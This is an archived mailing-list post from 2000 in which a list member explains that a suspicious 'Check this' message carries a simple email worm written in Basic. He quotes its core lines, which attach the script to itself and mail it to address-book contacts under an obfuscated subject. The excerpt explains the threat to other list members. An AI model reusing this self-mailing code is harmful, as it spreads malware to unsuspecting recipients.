Virus???!!!: "Check this" message posted earlier

Jecel Assumpcao Jr. jecel at merlintec.com
Wed Mar 1 00:05:21 UTC 2000

Michael Rueger wrote:
> Hi all,
> I'm not quite sure what to make of this, but it seems our mail system has
> detected a virus in this message posted to the mailing list?
>
> Or what do others see when looking at this message?

When I look at this message I see a silly "worm" written in Basic. Here is the
"meat" of it:

    A13.Subject = B("Bidbj!uihr")
    A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/")
    A13.Attachments.Add WScript.ScriptFullName
    A13.DeleteAfterSubmit = True
    A13.Send

Where the B function is a stupid crypto routine (hopefully not illegal to
export ;-) to make reading the program harder. A13 is an email to be sent to
one of your friends (or this list) as found in your address books.

The way the program quotes itself in order to save a copy to disk for later use
as an attachment  (third line above) isn't particularly interesting.

I found this very offensive - any viruses on this list should be written in
Squeak (or Python, at the very least!), don't you think?

-- Jecel